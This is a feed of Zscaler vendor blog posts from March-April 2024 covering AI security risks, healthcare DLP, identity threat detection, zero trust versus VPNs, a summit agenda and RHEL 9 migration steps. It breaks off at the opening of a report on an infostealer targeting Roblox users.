point: when to allow AI apps, when to block them, and how to mitigate ‘shadow AI’ risk One key theme in the report is that, to reap the full transformative potential of AI, enterprises must work to securely enable AI — that is, to minimize the risks associated with integrating and developing AI tools, while devising strategies to prevent or curtail an explosion of unapproved AI tools in the enterprise, a trend dubbed ‘shadow AI’. In general, enterprises can think about these risks as falling into three broad categories: Protecting sensitive data: Generative AI tools can inadvertently leak sensitive and confidential information, making data protection measures crucial. In fact, sensitive data disclosure is number six on the Open Worldwide Application Security Project (OWASP) Top Ten for AI Applications. Apart from adversarial threats like prompt injection attacks or malware, the biggest risks can stem from well-meaning users who inadvertently expose sensitive or proprietary data to large language models (LLMs). There are numerous ways that enterprise users may unknowingly do this, such as, for example, an engineer asking a gen AI tool to optimize or refactor proprietary code, or a sales team member asking an AI to use historical sales figures to forecast future pipeline. Enterprises should implement robust AI policy guidelines and technology-based data loss prevention (DLP) measures to prevent accidental data leaks and breaches. Meanwhile, they should also gain deep visibility into AI app usage to prevent or mitigate shadow AI, with granular access controls that ensure users only leverage approved AI applications. Data privacy and security risks of AI apps: Not all AI applications have the same level of data privacy and security. Terms, conditions, and policies can vary greatly, and enterprises should consider whether their data, for example, will be used to train language models, mined for advertising, or sold to third parties. Enterprises must assess and assign security risk scores to the AI applications they use, considering factors like data protection and the security practices of the companies behind them. Data quality and poisoning concerns: The quality and scale of data used to train AI applications directly impact the reliability of AI outputs. Enterprises should carefully evaluate the data quality when selecting an AI solution and establish a strong security foundation to mitigate risks like data poisoning. The new era of AI-driven threatsThe risks of AI are bi-directional: from outside enterprise walls, businesses face a continuous wave of threats that now includes AI-driven attacks. The reality is that virtually every type of existing threat can be aided by AI, which translates to attacks being launched at unprecedented speed, sophistication, and scale. Meanwhile, the future possibilities are limitless — meaning that enterprises face an unknown set of unknowns, when it comes to AI-driven cyber attacks. Still, clear attack patterns are emerging. In the 2024 AI Security Report, ThreatLabz provides insights into numerous evolving threats types, including: AI impersonation: AI deepfakes, sophisticated social engineering attacks, misinformation, and more. AI-generated phishing campaigns: end to end campaign generation, along with a ThreatLabz case study in creating a phishing login page using ChatGPT — in seven simple prompts. AI-driven malware and ransomware: how threat actors are leveraging AI automation across numerous stages of the attack chain. Using ChatGPT to generate vulnerability exploits: ThreatLabz shows how easy it is to create exploit PoCs, in this case for Log4j (CVE-2021-44228) and Apache HTTPS server path traversal (CVE-2021-41773) Dark chatbots: diving into the proliferation of dark web GPT models like FraudGPT and WormGPT that lack security guardrails. And much more… Best practices for secure AI transformation and layered AI + zero trust cyber defenseThe transformative power of AI is undeniable. To reap its enormous potential, enterprises must overcome the bi-directional set of risks that AI creates, namely: Securely enabling AI: protecting enterprise data while ushering in transformative productivity changes. Using AI to fight AI: using the power of enterprise security data to drive AI threat prevention across the attack chain, deliver real-time security insights, and fast-track zero trust. To that end, the Zscaler ThreatLabz 2024 AI Security Report offers key guidance, including: How to securely enable ChatGPT: a best practice case study for securing generative AI tools, in five steps. AI best practices and AI policy guidelines: AI frameworks and best practices that any enterprise can adopt. How Zscaler use AI to stop cyber threats: leveraging AI detections across each stage of the attack chain, with holistic visiblity into enterprise cyber risk How Zscaler enables secure AI transformation: the key capabilities that enterprises require to securely embrace genAI and ML tools, including: Full visibility into AI tool usage Granular access policy creation for AI Granular data security for AI applications Powerful controls with browser isolation Of course, AI begins and ends with the power of data. To dive deeper, download your copy of the Zscaler ThreatLabz 2024 AI Security Report or register for our live session with Zscaler CSO Deepen Desai, Navigating the AI Security Horizon: Insights from the Zscaler ThreatLabz 2024 AI Security Report. Meanwhile, if you want more information on how Zscaler is harnessing the power of AI, register for our innovation launch, The First AI Data Security Platform. Wed, 27 Mar 2024 11:54:38 -0700 Will Seaton The Best Medicine for Healthcare Data Is Integrated DLP You could argue that the challenges of securing medical data are more imposing than those of securing any other form of data. Electronic health records (EHR) are often transferred and shared between providers on a regular basis, and these records contain personal, in-depth patient data. These transfers put protected health information (PHI) at high risk as it moves from location to location. Additionally, the stringent regulations and compliance requirements for PHI force providers to learn how to construct the best data protection strategy for their needs—although this has been a necessary evil for some time now. To this end, our friends within the Health Information Management Working Group at CSA have put together a great discussion on the task of securing patient data and development of best practices. For providers looking for guidance from an expert that’s made the data protection journey, this content can be extremely valuable: Cloud Security Alliance Working Group: Health Information ManagementResearch Publication: Data Loss Prevention in healthcare One of the main topics of this publication is the architecture from which you should deliver data loss prevention (DLP) and data protection. While it’s important to understand best practices on how to implement data protection in the healthcare industry, it’s also valuable to know what the right architecture for a unified data protection platform should look like. With that, let's read a few paragraphs on how Gartner defines Security Service Edge and how it can help providers deliver better protection for data in motion and at rest. Securing Data In Motion In the medical and health industries, protecting sensitive data during transit is crucial. With the increasing reliance on digital platforms and the internet, organizations often face the challenge of safeguarding data over untrusted networks. The core building block for securing this sensitive data is DLP. Inline DLP combined with SSL inspection enables sensitive data in transit to be identified and classified. This ensures that data leaks to the internet or via email are prevented, maintaining the confidentiality of patient information. To this end, inline visibility into cloud apps such as electronic health record systems is also essential. By leveraging inline CASB technology, organizations can detect shadow IT and block risky apps, ensuring data security without hindering the use of critical cloud applications. In the healthcare industry, the use of personal devices by medical professionals and contractors poses a unique challenge. Implementing browser isolation technology allows for seamless data access on personal devices that doesn’t compromise their security. By hosting browser sessions in a secure cloud environment, sensitive data remains protected, even on unmanaged devices. Better yet, users get the specialized power of a purpose-built enterprise browser, only when needed, without having to change which browser they use. Perhaps the biggest benefit of SSE is that all of these unique features are integrated into a centralized, cloud-delivered platform. When hosted via the cloud, DLP is not only easier to deploy, but also more accurate in detection. Rather than dealing with multiple policies that could trigger differently and at different times, SSE gives you a singular view across your landscape, so decisions can be made on a holistic basis. Securing Data at Rest In the Medical Industry When it comes to securing medical data at rest, it’s worth learning and remembering a few key capabilities that have helped healthcare organizations do so with greater ease: SaaS Data Security lets you prioritize securing sensitive data in SaaS platforms, as it can be easily shared in risky ways. To prevent this, providers often consider adding CASB to their data protection strategy. By using a CASB that leverages the same DLP policy used for data at rest as that in motion, you can reduce alert fatigue and streamline response times. Since DLP engines will trigger the same to data inline and at rest in SaaS, visibility becomes consistent across channels. This is one of the main advantages of standardizing across a Security Service Edge architecture. SaaS Security Posture Management (SSPM) helps to identify and address misconfigurations in SaaS platforms, such as enabling multifactor authentication and closing risky open shares. Look for SSPM platforms that align with compliance frameworks like NIST or HIPAA to establish and maintain the required security posture. SaaS Supply Chain Security helps address the risks associated with third-party applications that may connect into your SaaS Platforms. You can scan SaaS platforms for risky connections from third-party applications that may have known vulnerabilities or allow unauthorized access to sensitive medical data. You’ll then get guidance on how to revoke these connections to ensure data hygiene and maintain a strong posture overall. . Endpoint DLP protects sensitive data stored on endpoints such as removable media or employee devices. Implement endpoint DLP with a unified agent that works alongside an SSE platform and enforces a unified DLP policy through inline inspection. This helps prevent data leaks and ensures the security of patient information. A word on Zscaler and shared workstation security: Securing data on shared workstations can sometimes be a challenge as implementing and managing user-level policy controls across multiple logins on a single device is often difficult to do. Zscaler integrates with the Imprivata Digital Identity platform allowing providers to easily support these multi-user workstation environments. Clinicians can easily and securely authenticate in and out of devices and only access applications for which they’ve been authorized. Bringing it All Together Unifying data protection into one platform is extremely powerful and can drastically simplify how you secure data. When delivered from an always-on cloud, you get one single DLP policy that follows users everywhere as well as consistent alerting, no matter where data is located. It’s helpful to gain a variety of perspectives on how to secure data, especially when it comes to a task as tricky as protecting medical data. While there are a multitude of different approaches to this task, understanding best practices can make all the difference for providers looking to begin their journey. All of this said, building the right architecture is equally important. If you’re interested in learning more about Security Service Edge and how Zscaler can help you secure your patient data, we’re here to chat or show you a demo. Photo Credit: Image by Tue, 26 Mar 2024 05:33:13 -0700 Tamer Baker Protecting Identity Becomes Pivotal in Stopping Cyberattacks As today’s workplace transforms, data is no longer centralised and is spread across cloud, increasing the attack surface. Attackers are constantly looking for vulnerabilities to exploit and searching for the Achilles heel in identity systems that could deliver them entry into your IT environment. Cyber actors are now using sophisticated methods to target Identity and access management infrastructure. Credential misuse is the most common attack method. According to Gartner, “Modern attacks have shown that identity hygiene is not enough to prevent breaches. Multifactor authentication and entitlement management can be circumvented, and they lack mechanisms for detection and response if something goes wrong.” Prioritize securing identity infrastructure with tools to monitor identity attack techniques, protect identity and access controls, detect when attacks are occurring, and enable fast remediation. Zscaler ITDR detects credential theft and privilege misuse, attacks on Active Directory, and risky entitlements that create attack paths With identity-based attacks on the rise, today’s businesses require the ability to detect when attackers exploit, misuse, or steal enterprise identities. Identifying and detecting identity-based threats is now crucial due to attackers' propensity of using credentials and Active Directory (AD) exploitation techniques for privilege escalations and for lateral movement across your environment. Zscaler ITDR helps you to thwart identity-based AD attacks in real-time and help you to gain actionable insight into gaps in your identity attack surface. The solution enables you to continuously monitor identities, provides visibility on misconfigurations/ risky permissions and detect identity-based attacks such as credential theft, multifactor authentication bypass, and privilege escalation. Gain Full Visibility Uncover blind spots and understand hidden vulnerabilities that leave your environment susceptible to identity-based attacks such as exposed surfaces, dormant credentials, and policy violations. Real-Time Identity Threat Detection and Response Zscaler Identity Protection uses identity threat detections and decoys that rise high fidelity alerts to help your security teams to swiftly remediate with targeted response. The same endpoint agent that runs deception also detects identity attacks on the endpoint. These include advanced attacks like DCSync, DCShadow, LDAP enumeration, session enumeration, Kerberoast attacks, and more. Reduce Identity Risk With deep visibility on identity context, Zscaler Identity Protection helps your security teams to identify, address, and purge compromised systems and exposed credentials quickly. Often, security teams struggle to collect context and correlations to investigate threats. Zscaler ITDR solves this problem by consolidating all risk signals, threats detected, failed posture checks , Okta metadata, and policy blocks (ZIA/ZPA) into a single view for each identity. You can now quickly investigate risky identities for indicators of compromise and potential exploitation. Prevent Credential Misuse/Theft Attackers use stolen credentials and attack Active Directory to escalate privileges to move laterally. Zscaler Identity Protection helps to detect credential exploits and prevent credential theft or misuse. Spot Lateral Movement Stop attackers who have gotten past perimeter-based defenses and are attempting to move laterally through your environment. Zscaler Deception ITDR enhances security by identifying misconfigurations and credential exposures that create attack paths for attackers to use for lateral movement. Zscaler ITDR: Beyond just prevention – Monitor, detect, & respond to identity threats Monitor: Identity systems are in constant flux with configuration and permissions changes. Get alerts when configuration changes introduce new risks. Organizations lack visibility into credential sprawl across their endpoint footprint, leaving them vulnerable to attackers who exploit these credentials to access sensitive data and apps. The solution is Zscaler ITDR, which audits all endpoints to identify credentials and other sensitive material in various sources such as files, registry, memory, cache, configuration files, credential managers, and browsers and gains visibility into endpoint credential exposure to identify lateral movement paths, enforcing policies, and cleaning up credentials to reduce the internal attack surface. Detect: ITDR automatically surfaces hidden risks that might otherwise slip through the cracks. Zscaler ITDR pulls together all risk signals, threats detected, posture checks failed, metadata from Okta, and policy blocks from ZIA/ZPA into a single unified view to provide a complete picture of risk for an identity. This helps to identify & detect unmanaged identities, misconfigured settings, and even credential misuse. Respond: ITDR spots attacks targeting your identity store, you can take immediate action. Restrict or terminate those identities causing trouble and shut down threats before they have a chance to wreak havoc. Zscaler ITDR Benefits Minimize the Attack Surface Reduce attack surface by gaining continuous visibility into the attack vectors and identity misconfigurations. Identify to stop adversarial advances—including ransomware attacks—in their tracks with traps set. Real-Time Identity Threat Detection Thwart sophisticated attacks on Active Directory using identity threat detections on endpoints. Accelerate Incident Response Built-in threat detection and response speeds up threat detections and expands coverage to significantly reduce mean time to response (MTTR). ITDR helps security teams drive down their mean time to respond and prioritize what matters most by risk scoring. Conclusion No matter what – Breaches are inevitable, and preventative security measures aren’t sufficient to thwart them. Though staying upbeat while fighting cyberthreats, shrinking budgets, and staff turnover is a tall task, how we respond today dictates how we perform tomorrow. Choosing and adopting identity protection solutions like ITDR helps your company evolve its zero trust security and compliance posture in response to the changing threat landscape. Zscaler ITDR strengthens your zero trust posture by mitigating the risks of user compromise and privilege exploitation. Fri, 22 Mar 2024 02:39:16 -0700 Nagesh Swamy Eliminate Risky Attack Surfaces Many moons ago, when the world wide web was young and the nerd in me was strong, I remember building a PC and setting it up as a web server. In those exciting, pioneering days, it was quite something to be able to have my very own IP address on the internet and serve my own web pages directly from my Apache server to the world. Great fun. I also remember looking at the server logs in horror as I scrolled through pages upon pages of failed login, and presumably hacking, attempts. I’d buttoned things up pretty nicely from a security standpoint, but even so, it would only have taken a vulnerability in an unpatched piece of software for a breach to occur, and from there, all bets would have been off. Even today, many internet service providers will let you provision your own server, should you feel brave enough. Of course, the stakes were not high for me at home, but knowing what we know now about the growth of ransomware attacks and how AI is facilitating them, no organization would dare do such a thing in 2024. Back then, I’d created an obvious and open attack surface. Tools were (and still are) readily available to scan IP address ranges on any network and identify open ports. In my case, ports 22, 80 and 443 were open to serve web pages and enable me to administer my server remotely. Every open port is a potential conduit into the heart of the hosting device, and so these should be eliminated where possible. Open ports, VPNs, and business Since online remote working became a real possibility in the early 2000s, organizations have tried to protect themselves and their employees by adopting VPN technology to encrypt traffic between a remote device and a VPN concentrator at the head office, allowing employees access to services like email, file and print servers. Even when these services became cloud-based solutions like Gmail and DropBox, many organizations pulled that traffic across a VPN to apply IT access policies. Not only did this often lead to an inefficient path from a remote worker to their applications, it also presented a serious security risk. As the performance and dependability of the internet grew, we also saw the advent of site-to-site VPNs, which made for an attractive alternative to far more expensive circuit-based connections that had been so prevalent such as MPLS. A vast number of organizations continue to rely on a virtual wide area network (WAN) built on top of VPNs. Unfortunately, as the old saying goes, there’s no such thing as a free lunch. Every VPN client or site using the internet as its backbone needs an IP address to connect to, an open port to connect through, and, well, you can see where this is going. Not every VPN solution has an active flaw, just as—luckily—my Apache server didn’t at the time I was running it. That said, software is fallible, and history has demonstrated this fact in numerous instances in which vulnerabilities are discovered and exploited in VPN products. Just last month, a fatal flaw was discovered in Ivanti’s VPN services, leaving thousands of users and organizations open to attack. Hackers are scouring day and night for vulnerabilities like these to exploit—and AI is only making their lives easier. “without proper configuration, patch management, and hardening, VPNs are vulnerable to attack” from Securing IPsec Virtual Private Networks by the National Security Agency (NSA) Zscaler is different The Zscaler Zero Trust Exchange™ works in a fundamentally different way—no VPN is required to securely connect. Instead, connections via the internet (or even from within a managed network) are policed on multiple levels. An agent on your device creates a TLS tunnel to the Zscaler cloud, which accepts connections only from known tenants (or Zscaler customers). This tunnel is mutually authenticated and encrypted between the agent and the Zscaler cloud. The individual and their device(s) must additionally be identified as part of the process. In short, it’s not possible to simply make a TLS connection to Zscaler. Once an approved user from a known customer with a recognized device connects to Zscaler, they’re still prevented from moving laterally over the network, as is the case with VPNs. With Zscaler, there is no IP range to which the user has access. Instead, every connection attempt has to be authorized, following the principles of zero trust. A user has access only to the applications for which they’ve been authorized. With this framework, even if an organization were to be successfully attacked, the blast radius would be limited. The same cannot be said for network-based security. Here’s the bottom line: VPNs and the firewalls behind them served us well for a long time, but the challenges that come with maintaining a security posture built on these legacy technologies are so great that it’s now a material business risk to use them. You need only to turn the news on for a few minutes to be reminded of this. Networks were built fundamentally to enable connectivity, and adding security to these networks is an uphill battle of putting the right obstacles in the way of that connectivity. This is why more and more public bodies and private organizations are turning this idea on its head and embracing a zero trust architecture that provides access for only an approved entity, on an approved device, to the applications to which they are entitled. At Zscaler we have built tools to help you assess the potential risk your own organization faces, some of which are free to access. Test your own defenses by visiting and when you’re ready to learn more, get in touch! Tue, 02 Apr 2024 01:00:01 -0700 Simon Tompson Break Free from Appliance-Based Secure Web Gateway (SWG) The way we work today is vastly different from a few years ago. McKinsey & Company’s State of Organization 2023 report identified that before the COVID-19 pandemic, most organizations expected employees to spend more than 80% of their time in-office. But as of 2023, says the report, 90% of employees have embraced hybrid models, allowing them to work from home or other locations some (if not most) of the time. On a similar note, applications previously hosted in on-premises data centers are increasingly moving to the cloud. Gartner predicted that SaaS application spending would grow 17.9% to total $197 billion in 2023. With employees and apps both migrating off-premises, security controls logically must do the same. It’s no exaggeration to state that cloud and mobility have broken the legacy way of approaching security—so why should the castle-and-moat security approach, heavily reliant on hardware such as appliance-based proxies/SWGs, still exist? Users need fast, reliable, secure connectivity to the internet and cloud apps, with the flexibility to connect and work from anywhere. However, traditional SWGs have certain limitations, leading to security challenges, poor user experience, constant maintenance, and scalability issues. Let’s take a look at why it’s time to break free from appliance-based SWG. Security challengesIn December 2013, the Google Transparency Report showed just 48% of World Wide Web traffic was encrypted. Today, the same report shows at least 95% of traffic is encrypted. So, it’s no surprise that the Zscaler ThreatLabz 2023 State of Encrypted Attacks report showed 85.9% of threats—malware payloads, phishing scams, ad spyware sites, sensitive data leaks, and more—are now delivered over encrypted channels. While most organizations have some form of protection against malware, attackers are evolving their techniques, creating new variants able to bypass reputation-based detection technologies. As threat actors increasingly rely on encrypted channels, it’s more crucial than ever to inspect 100% of TLS/SSL traffic. This is the biggest way appliance-based proxies weigh down organizations: most SWG appliances lack the capacity to perform 100% inspection. Our 2023 State of Encrypted Attacks report surveyed 284 IT, security, and networking professionals and found that they mainly use legacy tools like web application firewalls and network-layer firewalls to scan traffic. However, respondents agreed that complexity, cost, and performance degradation are the biggest barriers to inspecting all TLS/SSL traffic. Furthermore, certain regulations require different policies for distinct data types, making inspection an arduous task. Poor user experienceCompared to only a few years ago, the meaning of “fast” is very different for today’s internet users. Instant access and connectivity has become the norm at home. Employees juxtapose the great digital experience in their personal lives with poor connectivity and performance issues that plague their digital work lives. Appliance-based SWGs are among the main culprits of poor user experience because they can’t scale quickly to handle traffic surges, and they require traffic to be backhauled to a central data center, leading to high latency and lost productivity for users trying to access the internet or SaaS applications. And all this inevitably affects revenue. Maintenance and scalability issuesApart from complexity and tedious management, other challenges of appliance-based SWGs are maintenance and scalability issues. To account for traffic surges and future growth, security teams are forced to overprovision, leading to expensive appliances sitting unused. At other times, they may need to wait multiple months for appliances/upgrades to arrive. With appliance-based SWG, security teams are always spread too thin, having to constantly update SWGs to account for changes to the organization and/or the threat landscape. The Zscaler differenceOvercome the limitations of appliance-based SWG with Zscaler. Better security: Inspect 100% of TLS/SSL traffic to find and stop threats—86% of which are delivered over encrypted channels. Better user experience: Stop backhauling internet/SaaS traffic with AI-powered Zscaler SWG, delivered from 150+ points of presence worldwide–close to your users and their cloud destinations for lower latency. No hardware to maintain: Move to a cloud native proxy architecture and eliminate the hardware headaches of maintenance, updates, patches, and upgrades. Platform approach: Extend comprehensive security functions, such as cloud firewall, sandbox, CASB, and data loss prevention, as well as end-to-end experience monitoring from a single unified platform and agent. If you’d like to know more about the reasons to break free from appliance-based proxies, check out this on-demand webinar. Wed, 20 Mar 2024 07:04:23 -0700 Apoorva Ravikrishnan Mobile World Congress shows a vision of even more connected things I approached this year’s Mobile World Congress as I usually would – with a very open mind. However, this year was different. It was far more fulfilling than previous years and, in some ways, had me feeling overwhelmed. Not so much by the sheer distances walked each day (approximately 20 kilometers) but by the types of discussions about the state of the telco industry and its future directions that were both enlightening and refreshing. For the first time I had the feeling that 5G will reach new milestones this year based on the various innovations that were on show. Telco networks need to seize opportunities Network operators globally are shaping their future, with MWC serving as the perfect moment to come together and discuss perspectives and the various opportunities that need to be recognised. Within this, what they can offer with regards to insights into data streams and providing additional overlays or security services on top to make their services more valuable and stick for customers were some of the key focus points. More important, however, is the growing opportunity to be more connected than ever before, offering the maximum potential of interconnectivity. Thanks to this, there is a clear opportunity for collaboration and the critical next steps that will define the future of telco networks for years to come. For this to happen, however, telcos must start seeing the value of their infrastructure. Similarities can be drawn with parallel industries, take banking for example. The SWIFT network is critical for international money transfers. While this network is great, there was a demand from consumers to have a faster, simpler network to move money. Given this, the financial industry has complied with more agile alternatives such as the VENMO, PayPal, and intra bank networks to deliver high speed financial transactions. These additional services are what drive adoption and value add to financial networks. Telcos, however, risk falling into two traps: Becoming a network provider to simply move data traffic or expanding their offerings by bundling additional services, such as partnering with Netflix as part of an entertainment package at no extra charge. So far in Telco we haven’t seen a level of innovation within its services that will lead to the additional demand for and consumption of said services. This is where true innovation will happen in the near future. Optimisations are required between every single network and service operator that is delivering and or creating content. In the age of AI, the level of data and measurement that can be consumed to ensure the best sets of services must be leveraged. From understanding how to best compress a video file through to moving and allowing disparate edge computing usage. All of this is to be delivered through intelligent insights. A few companies have the foresight to realise that they must start looking into the contextual aspects of interconnectivity. It is more important to figure out why a specific device is connected on a specific network, when thousands of devices are making connections every second. Telco providers need to find a way to bucket this information to orchestrate the data streams effectively and deliver on the value of the data that is created. My key takeaways from the show are: SIMS are literally everywhere From facilitating seamless communication between devices to enabling groundbreaking technologies, the versatility and adaptability of SIM cards are redefining the boundaries of connectivity. E-SIMS will allow organisations to provide country-specific access to data that travels with the user. The question that pops into my head is how these data streams will be secured in the future? 5G is real 5G is no longer a theory only, even in Europe. While we still don’t have the proper standalone 5Gs in Europe, private 5G has matured to be widely accepted and used. We were always waiting for the killer app in previous years and speculating about the virtual reality goggles occupying this space. More and more applications are demonstrating the potential of virtual worlds this year, e.g., for training purposes. Data sovereignty is a driving force Given our fragile global situation, the topic of data sovereignty has been getting more attention. Organisations and governments alike want to be able to take active control of the locations of their data, and not only data resilience. The debate steered by NIS2 and new security measurements for national critical infrastructures ties into this data sovereignty, software, and cloud ecosystems as well. Moving forward, the focus will be on connectivity being delivered everywhere now that almost everything is SIM enabled. There will also be questions around how telcos will make use of all the available information, and perhaps more importantly, how they can orchestrate it in one environment and deliver effective controls. The great unifier is security – every user, company, and service demands uniform security on any network. Zscaler as the world’s largest cloud security service, available everywhere, is in a poignant situation to deliver this glue. Wed, 20 Mar 2024 04:06:08 -0700 Nathan Howe 2024 Zscaler Public Sector Summit in Washington DC In March 2023 Zscaler held its inaugural Public Sector Summit, bringing together over 500 government and industry leaders to separate zero trust fact from fiction. The exchange last year was enlightening and energizing! We captured highlights from the event in an eBook, The Power of Zero Trust, including the challenges agencies are facing, some of our best practices for developing a robust zero trust architecture, and a use case demonstrating how zero trust can integrate into every part of your agency’s operations. As we prepare for the 2024 Public Sector Summit on April 4th, I am excited that this year’s line up will be bigger and even more engaging. With more than 22 guest speakers from across government, education and private sector, the audience will hear top of mind topics and discuss current threats and challenges facing agencies and the supporting community such as AI, funding zero trust initiatives, safeguarding critical infrastructure, SD-WAN and much more. Distinguished Speakers The power of the public sector community is in the forward-thinking individuals across agencies who have dedicated their careers to transforming our nation securely. We’ve built a program for the day with a stellar lineup of speakers including: Dr. Kelly Fletcher, CIO Department of State, Luis Coronado, CIO State Consular Affairs, and Eric Hysen, CIO/Chief AI Officer Department of Homeland Security will join Zscaler CEO Jay Chaudhry during his keynote. Chris DeRusha, Federal CISO and Deputy National Cyber Director, OMB. Panel on resources to fuel government modernization with Jessie Posilkin, Technical Lead at Technology Modernization Fund, Maria Roat of MA Consulting and Eric Mill of GSA. Suneel Cherukuri, CISO, DC Government Zach Benz, Sr. Mgr for Cyber Operations/DCISO with Sandia National Laboratories to talk about AI/ML. Panel discussing zero trust implementations with Gerald Caron, CIO, ITA/Commerce, Dan Han, CISO of VCU, Bob Costello, CISO of CISA and Dr. Gregory Edwards, CISO of FEMA. DoD leaders including Winston Beauchamp, DCISO with the Department of Air Force and General Les Call, Director of Zero Trust portfolio management office. Systems Integrator panel with Justin DePalmo, CISO and VP of IT at GDIT and Bob Ritchie, SVP & CTO at SAIC. Nelson Sims, Cyber Architect, DC Water and Dustin Glover, Chief Cyber Officer, State of Louisiana to discuss securing critical infrastructure. From Revolution to Evolution Our CEO and founder, Jay Chaudhry, will keynote the event setting the stage with his perspective on the zero trust revolution that began over a decade ago, and how that has now surpassed the tipping point in adoption thanks to the dedication of IT leaders across government.. He will be joined on stage by Dr. Fletcher, Luis Coronado and Eric Hysen and followed by many more innovators within the public sector speaking to a number of current cybersecurity issues including: Using AI to combat AI-based threats OMB’s perspective on the state of zero trust Unlocking resources to continue modernizing How agency leaders are taking the next steps in their zero trust implementations New innovations in predictive cybersecurity to identify and resolve vulnerabilities View the full agenda here to see the range of topics to be addressed during this year’s summit. Hands-On Zero Trust In addition to the informative sessions, we will also have hands-on solution stations this year for attendees to dive deeper into areas including: From Zero Access to Zero Trust in 10 Minutes: A joint solution with our integration partners AWS, Okta, and CrowdStrike Your Network Transformed: Zero trust for cloud and branch TheatLabz: Global Internet threat insights from Zscaler's research team CMMC: Empowered by zero trust Customer Success Center Zscaler Digital Experience We’re excited to welcome the public sector community in-person for a full day of learning, networking and experiences from the most forward-thinking Government IT leaders. Register today to learn more on how you can Simply, Secure and Transform your agency. Space is limited for this live event so we’ll be in touch to confirm your invitation. There is no charge for the event. Tue, 19 Mar 2024 08:03:31 -0700 Peter Amirkhan Zscaler Selects Red Hat Enterprise Linux 9 (RHEL 9) as Next-Gen Private Access Operating System What’s new?On June 30, CentOS 7 will reach end of life, requiring migrations in many software stacks and server environments. In advance of this, Zscaler has selected Red Hat Enterprise Linux 9 as the next-generation operating system for Zscaler Private AccessTM (ZPA). RHEL 9 is the modern enterprise equivalent to CentOS 7, backed by Red Hat, and supported through 2032. This continues ZPA’s proven stability and resiliency on open source Linux platforms and builds on 10 years of maturity on Red Hat Enterprise Linux-based derivatives. What’s more, this transition can be done with no impact to operations or user access. When will it be released?Pre-built images for all ZPA-supported platforms are targeted for release in May 2024. All ZPA images, including containers, hypervisors, and public cloud offerings, will be replaced with RHEL 9. This is the recommended deployment for all future App Connector and Private Service Edge components, and customers should begin migration immediately on release. For customers that manage their own Red Hat base images, Zscaler is targeting the end of April 2024 for release of RHEL 9-native Red Hat Package Manager (RPM) and repositories. New Enterprise OS Without Licensing FeesTo ensure an excellent experience for our customers, Zscaler will provide operating system licenses for all RHEL 9 images on supported platforms. This continues our commitment to secure, open source platforms without imposing additional licensing costs on our customers. We also understand the need for control over security baseline images that meet your security posture and will continue to provide RPM options through support of RHEL 8 and RHEL 9. These software packages are bring-your-own-license (BYOL) and won’t conflict with any existing Red Hat enterprise license agreements you may hold. CentOS 7 End of LifeThe CentOS Project and Red Hat will be ending the final extended support for CentOS 7 and RHEL 7 on June 30, 2024. While we aim to provide RHEL 9 support in advance of this date (and do currently support RHEL 8 with RPMs), we recognize that the transition is a large undertaking, affecting all enterprise data centers, and operations and will take time to transition over to new operating systems and software. In light of this, we want to provide ample time to migrate while considering the security implications of continuing to support an obsolete operating system. Zscaler will support existing CentOS 7 deployments, RPMs, and distribution servers until December 24, 2024. We are confident our ZPA architecture and design uniquely position us to continue to support CentOS 7 past its expiry date. See End-of-Support for CentOS 7.x, RHEL 7.x, and Oracle Linux 7.x for more details on CentOS EOL and the ZPA white paper for architecture and security design. While we have ample controls in place and the utmost confidence, there is always inherent risk in using an unsupported server operating system. Zscaler will not provide backported operating system patches during this transition, but will maintain the ZPA software and supporting security libraries. Lightweight and Container Orchestration ReadyFollowing Zscaler’s cloud-native and best-in-class zero trust approach, ZPA infrastructure components are designed to be lightweight, container ready, and quickly deployed. This allows App Connector and Private Service Edge the benefit of being scaled and migrated without worry for previously deployed instances or operating system upgrade paths. For these reasons, the migration best practice is to deploy new App Connectors and Private Service Edges. Zscaler does not provide direct operating system upgrade paths for currently deployed infrastructure components. In further support of this, we offer Open Container Initiative (OCI) compatible images for Docker CE, Podman, and Red Hat OpenShift Platform. These images as well as the public cloud marketplaces are fully ready for autoscale groups, supporting quick scale up and scale down. Migration and Support ExcellenceZscaler understands your concerns and will fully support you throughout this transition process. Our Technical Account Managers, Support Engineers, and Professional Services are ready to address all concerns related to migration. If a temporary increase of App Connector or PSE limits are needed in your environment to complete migration, there will be no extra licensing costs. Below are the steps to help you replace CentOS 7 instances with RHEL 9. The enrollment and provisioning of new App Connectors and Private Service Edges can be automated in a few steps using Terraform (infrastructure-as-code) or Container Orchestration to simplify deployment further. App Connector Migration Steps:Create new App Connector Groups and provisioning keys for each location (Note: do not reuse existing provisioning keys as it will add the new RHEL 9 App Connectors to the old App Connector Groups. Mixing different host OS and Zscaler software versions in a single group is not supported.) Update the App Connector group's version profile to "default - el9" so that it's able to receive the proper binary updates (This version profile can be set as default for the tenant once all connectors are moved to RHEL 9) Deploy new VMs using the upcoming RHEL 9 OVAs and newly created provisioning keys (templates can be used) Add the new App Connector Groups to each respective Server Group (Optional) In the UI, disable the app connector groups five minutes prior to the regional off-hours maintenance window to allow connections to gradually drain down During regional off-hours, remove the CentOS 7 App Connector Groups Private Service Edge Migration Steps:Create new Service Edge Groups and provisioning keys for each location (Note: do not reuse existing provisioning keys as it will add the new RHEL 9 PSEs to the old Service Edge Groups. Mixing different host OS and Zscaler software versions in a single group is not supported.) Update the Service Edge Group's version profile to "Default - el9" so that it's able to receive the proper binary updates (This version profile can be set as default for the tenant once all connectors and PSEs are moved to RHEL 9) Deploy new VMs using the upcoming RHEL 9 OVAs and the newly created provisioning keys (templates can be used) Add trusted networks and enable “publicly accessible” (if applicable) on the new Service Edge Groups (Optional) In the UI, disable the Service Edge Groups 15 minutes prior to the regional off-hours maintenance window to allow connections to gradually drain down During regional off hours, remove trusted networks and disable public access (if applicable) on CentOS 7 Service Edge Groups Please reach out to your respective support representatives for further assistance and information as needed. For more information: Zscaler Private Access Website Zscaler Private Access | Zero Trust Network Access (ZTNA) End-of-Support for CentOS 7.x, RHEL 7.x, and Oracle Linux 7.x ZPA App Connector Software by Platform ZPA Private Service Edge Software by Platform Mon, 18 Mar 2024 15:34:32 -0700 Shefali Chinni Tweaks Stealer Targets Roblox Users Through YouTube and Discord IntroductionZscaler’s ThreatLabz recently discovered a new campaign distributing an infostealer called Tweaks (aka Tweaker) that targets Roblox users. Attackers are exploiting popular platforms, like YouTube and Discord, to distribute Tweaks to Roblox users, capitalizing on the ability of legitimate platforms to evade detection by web filter block lists that typically block known malicious servers. Attackers share malicious files disguised as Frames Per Second (FPS) optimization packages with users and, in turn, users infect their own systems with Tweaks malware.Given that 45% of Roblox users are under 13, it’s probable that the malware being circulated could extend to parents’ systems. Furthermore, with the proliferation of remote work, there’s a possibility of this malware infiltrating corporate devices (surreptitiously) used by children of employees. Not only does a successful infection leave 